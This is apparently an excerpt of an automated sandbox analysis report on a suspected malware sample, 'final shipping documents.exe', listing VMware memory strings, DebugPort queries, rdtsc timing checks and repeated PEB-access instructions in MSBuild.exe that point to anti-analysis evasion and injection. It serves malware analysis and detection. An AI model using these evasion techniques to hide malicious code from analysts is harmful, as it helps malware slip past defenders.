Source: explorer.exe, 0000001A.00000002.3133392253.000000000CA8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
Source: explorer.exe, 0000000A.00000000.1479357808.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
Source: explorer.exe, 0000001A.00000002.3123251512.00000000092D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001A.00000002.3133392253.000000000CA8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}\u\|K
Source: explorer.exe, 0000001A.00000002.3133392253.000000000CA8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\F\|Z
Source: explorer.exe, 0000000A.00000000.1479357808.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 0000000A.00000003.2273498189.000000000730A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_xU1
Source: explorer.exe, 0000001A.00000003.2466197460.0000000004C6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
Source: explorer.exe, 0000001A.00000002.3133392253.000000000CA8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}f9507ed\|
Source: explorer.exe, 0000001A.00000003.2466197460.0000000004C6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
Source: explorer.exe, 0000001A.00000003.2625153058.000000000C9BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000001A.00000002.3123251512.00000000092D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8
Source: explorer.exe, 0000001A.00000002.3133392253.000000000CA8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.1505638874.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2465635180.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
Source: explorer.exe, 0000000A.00000000.1479357808.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: explorer.exe, 0000001A.00000002.3133392253.000000000C907000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_@
Source: explorer.exe, 0000001A.00000003.2603294803.00000000093B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMWare
Source: explorer.exe, 0000000A.00000003.2271883483.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
Source: explorer.exe, 0000001A.00000002.2792625509.0000000001199000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000

Source: C:\Users\user\Desktop\final shipping documents.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\explorer.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\explorer.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\mstsc.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 9_2_00409AA0 rdtsc

9_2_00409AA0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 9_2_0040ACE0 LdrLoadDll,

9_2_0040ACE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA0185 mov eax, dword ptr fs:[00000030h]	9_2_01AA0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B04180 mov eax, dword ptr fs:[00000030h]	9_2_01B04180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B04180 mov eax, dword ptr fs:[00000030h]	9_2_01B04180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE019F mov eax, dword ptr fs:[00000030h]	9_2_01AE019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE019F mov eax, dword ptr fs:[00000030h]	9_2_01AE019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE019F mov eax, dword ptr fs:[00000030h]	9_2_01AE019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE019F mov eax, dword ptr fs:[00000030h]	9_2_01AE019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A5A197 mov eax, dword ptr fs:[00000030h]	9_2_01A5A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A5A197 mov eax, dword ptr fs:[00000030h]	9_2_01A5A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A5A197 mov eax, dword ptr fs:[00000030h]	9_2_01A5A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B1C188 mov eax, dword ptr fs:[00000030h]	9_2_01B1C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B1C188 mov eax, dword ptr fs:[00000030h]	9_2_01B1C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A901F8 mov eax, dword ptr fs:[00000030h]	9_2_01A901F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B361E5 mov eax, dword ptr fs:[00000030h]	9_2_01B361E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B261C3 mov eax, dword ptr fs:[00000030h]	9_2_01B261C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B261C3 mov eax, dword ptr fs:[00000030h]	9_2_01B261C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01ADE1D0 mov eax, dword ptr fs:[00000030h]	9_2_01ADE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01ADE1D0 mov eax, dword ptr fs:[00000030h]	9_2_01ADE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01ADE1D0 mov ecx, dword ptr fs:[00000030h]	9_2_01ADE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01ADE1D0 mov eax, dword ptr fs:[00000030h]	9_2_01ADE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01ADE1D0 mov eax, dword ptr fs:[00000030h]	9_2_01ADE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A90124 mov eax, dword ptr fs:[00000030h]	9_2_01A90124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B20115 mov eax, dword ptr fs:[00000030h]	9_2_01B20115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0A118 mov ecx, dword ptr fs:[00000030h]	9_2_01B0A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0A118 mov eax, dword ptr fs:[00000030h]	9_2_01B0A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0A118 mov eax, dword ptr fs:[00000030h]	9_2_01B0A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0A118 mov eax, dword ptr fs:[00000030h]	9_2_01B0A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0E10E mov eax, dword ptr fs:[00000030h]	9_2_01B0E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0E10E mov ecx, dword ptr fs:[00000030h]	9_2_01B0E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0E10E mov eax, dword ptr fs:[00000030h]	9_2_01B0E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0E10E mov eax, dword ptr fs:[00000030h]	9_2_01B0E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0E10E mov ecx, dword ptr fs:[00000030h]	9_2_01B0E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0E10E mov eax, dword ptr fs:[00000030h]	9_2_01B0E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0E10E mov eax, dword ptr fs:[00000030h]	9_2_01B0E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0E10E mov ecx, dword ptr fs:[00000030h]	9_2_01B0E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0E10E mov eax, dword ptr fs:[00000030h]	9_2_01B0E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0E10E mov ecx, dword ptr fs:[00000030h]	9_2_01B0E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B34164 mov eax, dword ptr fs:[00000030h]	9_2_01B34164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B34164 mov eax, dword ptr fs:[00000030h]	9_2_01B34164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AF4144 mov eax, dword ptr fs:[00000030h]	9_2_01AF4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AF4144 mov eax, dword ptr fs:[00000030h]	9_2_01AF4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AF4144 mov ecx, dword ptr fs:[00000030h]	9_2_01AF4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AF4144 mov eax, dword ptr fs:[00000030h]	9_2_01AF4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AF4144 mov eax, dword ptr fs:[00000030h]	9_2_01AF4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A66154 mov eax, dword ptr fs:[00000030h]	9_2_01A66154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A66154 mov eax, dword ptr fs:[00000030h]	9_2_01A66154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A5C156 mov eax, dword ptr fs:[00000030h]	9_2_01A5C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AF8158 mov eax, dword ptr fs:[00000030h]	9_2_01AF8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A580A0 mov eax, dword ptr fs:[00000030h]	9_2_01A580A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AF80A8 mov eax, dword ptr fs:[00000030h]	9_2_01AF80A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B260B8 mov eax, dword ptr fs:[00000030h]	9_2_01B260B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B260B8 mov ecx, dword ptr fs:[00000030h]	9_2_01B260B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A6208A mov eax, dword ptr fs:[00000030h]	9_2_01A6208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A5A0E3 mov ecx, dword ptr fs:[00000030h]	9_2_01A5A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE60E0 mov eax, dword ptr fs:[00000030h]	9_2_01AE60E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A680E9 mov eax, dword ptr fs:[00000030h]	9_2_01A680E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A5C0F0 mov eax, dword ptr fs:[00000030h]	9_2_01A5C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA20F0 mov ecx, dword ptr fs:[00000030h]	9_2_01AA20F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE20DE mov eax, dword ptr fs:[00000030h]	9_2_01AE20DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A5A020 mov eax, dword ptr fs:[00000030h]	9_2_01A5A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A5C020 mov eax, dword ptr fs:[00000030h]	9_2_01A5C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AF6030 mov eax, dword ptr fs:[00000030h]	9_2_01AF6030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE4000 mov ecx, dword ptr fs:[00000030h]	9_2_01AE4000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B02000 mov eax, dword ptr fs:[00000030h]	9_2_01B02000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B02000 mov eax, dword ptr fs:[00000030h]	9_2_01B02000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B02000 mov eax, dword ptr fs:[00000030h]	9_2_01B02000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B02000 mov eax, dword ptr fs:[00000030h]	9_2_01B02000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B02000 mov eax, dword ptr fs:[00000030h]	9_2_01B02000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B02000 mov eax, dword ptr fs:[00000030h]	9_2_01B02000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B02000 mov eax, dword ptr fs:[00000030h]	9_2_01B02000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B02000 mov eax, dword ptr fs:[00000030h]	9_2_01B02000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A7E016 mov eax, dword ptr fs:[00000030h]	9_2_01A7E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A7E016 mov eax, dword ptr fs:[00000030h]	9_2_01A7E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A7E016 mov eax, dword ptr fs:[00000030h]	9_2_01A7E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A7E016 mov eax, dword ptr fs:[00000030h]	9_2_01A7E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8C073 mov eax, dword ptr fs:[00000030h]	9_2_01A8C073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A62050 mov eax, dword ptr fs:[00000030h]	9_2_01A62050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE6050 mov eax, dword ptr fs:[00000030h]	9_2_01AE6050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8438F mov eax, dword ptr fs:[00000030h]	9_2_01A8438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8438F mov eax, dword ptr fs:[00000030h]	9_2_01A8438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A5E388 mov eax, dword ptr fs:[00000030h]	9_2_01A5E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A5E388 mov eax, dword ptr fs:[00000030h]	9_2_01A5E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A5E388 mov eax, dword ptr fs:[00000030h]	9_2_01A5E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A58397 mov eax, dword ptr fs:[00000030h]	9_2_01A58397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A58397 mov eax, dword ptr fs:[00000030h]	9_2_01A58397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A58397 mov eax, dword ptr fs:[00000030h]	9_2_01A58397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A703E9 mov eax, dword ptr fs:[00000030h]	9_2_01A703E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A703E9 mov eax, dword ptr fs:[00000030h]	9_2_01A703E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A703E9 mov eax, dword ptr fs:[00000030h]	9_2_01A703E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A703E9 mov eax, dword ptr fs:[00000030h]	9_2_01A703E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A703E9 mov eax, dword ptr fs:[00000030h]	9_2_01A703E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A703E9 mov eax, dword ptr fs:[00000030h]	9_2_01A703E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A703E9 mov eax, dword ptr fs:[00000030h]	9_2_01A703E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A703E9 mov eax, dword ptr fs:[00000030h]	9_2_01A703E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A963FF mov eax, dword ptr fs:[00000030h]	9_2_01A963FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A7E3F0 mov eax, dword ptr fs:[00000030h]	9_2_01A7E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A7E3F0 mov eax, dword ptr fs:[00000030h]	9_2_01A7E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A7E3F0 mov eax, dword ptr fs:[00000030h]	9_2_01A7E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B043D4 mov eax, dword ptr fs:[00000030h]	9_2_01B043D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B043D4 mov eax, dword ptr fs:[00000030h]	9_2_01B043D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A683C0 mov eax, dword ptr fs:[00000030h]	9_2_01A683C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A683C0 mov eax, dword ptr fs:[00000030h]	9_2_01A683C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A683C0 mov eax, dword ptr fs:[00000030h]	9_2_01A683C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A683C0 mov eax, dword ptr fs:[00000030h]	9_2_01A683C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A6A3C0 mov eax, dword ptr fs:[00000030h]	9_2_01A6A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A6A3C0 mov eax, dword ptr fs:[00000030h]	9_2_01A6A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A6A3C0 mov eax, dword ptr fs:[00000030h]	9_2_01A6A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A6A3C0 mov eax, dword ptr fs:[00000030h]	9_2_01A6A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A6A3C0 mov eax, dword ptr fs:[00000030h]	9_2_01A6A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A6A3C0 mov eax, dword ptr fs:[00000030h]	9_2_01A6A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0E3DB mov eax, dword ptr fs:[00000030h]	9_2_01B0E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0E3DB mov eax, dword ptr fs:[00000030h]	9_2_01B0E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0E3DB mov ecx, dword ptr fs:[00000030h]	9_2_01B0E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0E3DB mov eax, dword ptr fs:[00000030h]	9_2_01B0E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE63C0 mov eax, dword ptr fs:[00000030h]	9_2_01AE63C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B1C3CD mov eax, dword ptr fs:[00000030h]	9_2_01B1C3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B38324 mov eax, dword ptr fs:[00000030h]	9_2_01B38324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B38324 mov ecx, dword ptr fs:[00000030h]	9_2_01B38324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B38324 mov eax, dword ptr fs:[00000030h]	9_2_01B38324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B38324 mov eax, dword ptr fs:[00000030h]	9_2_01B38324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9A30B mov eax, dword ptr fs:[00000030h]	9_2_01A9A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9A30B mov eax, dword ptr fs:[00000030h]	9_2_01A9A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9A30B mov eax, dword ptr fs:[00000030h]	9_2_01A9A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A5C310 mov ecx, dword ptr fs:[00000030h]	9_2_01A5C310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A80310 mov ecx, dword ptr fs:[00000030h]	9_2_01A80310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0437C mov eax, dword ptr fs:[00000030h]	9_2_01B0437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B2A352 mov eax, dword ptr fs:[00000030h]	9_2_01B2A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B08350 mov ecx, dword ptr fs:[00000030h]	9_2_01B08350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE2349 mov eax, dword ptr fs:[00000030h]	9_2_01AE2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE2349 mov eax, dword ptr fs:[00000030h]	9_2_01AE2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE2349 mov eax, dword ptr fs:[00000030h]	9_2_01AE2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE2349 mov eax, dword ptr fs:[00000030h]	9_2_01AE2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE2349 mov eax, dword ptr fs:[00000030h]	9_2_01AE2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE2349 mov eax, dword ptr fs:[00000030h]	9_2_01AE2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE2349 mov eax, dword ptr fs:[00000030h]	9_2_01AE2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE2349 mov eax, dword ptr fs:[00000030h]	9_2_01AE2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE2349 mov eax, dword ptr fs:[00000030h]	9_2_01AE2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE2349 mov eax, dword ptr fs:[00000030h]	9_2_01AE2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE2349 mov eax, dword ptr fs:[00000030h]	9_2_01AE2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE2349 mov eax, dword ptr fs:[00000030h]	9_2_01AE2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE2349 mov eax, dword ptr fs:[00000030h]	9_2_01AE2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE2349 mov eax, dword ptr fs:[00000030h]	9_2_01AE2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE2349 mov eax, dword ptr fs:[00000030h]	9_2_01AE2349
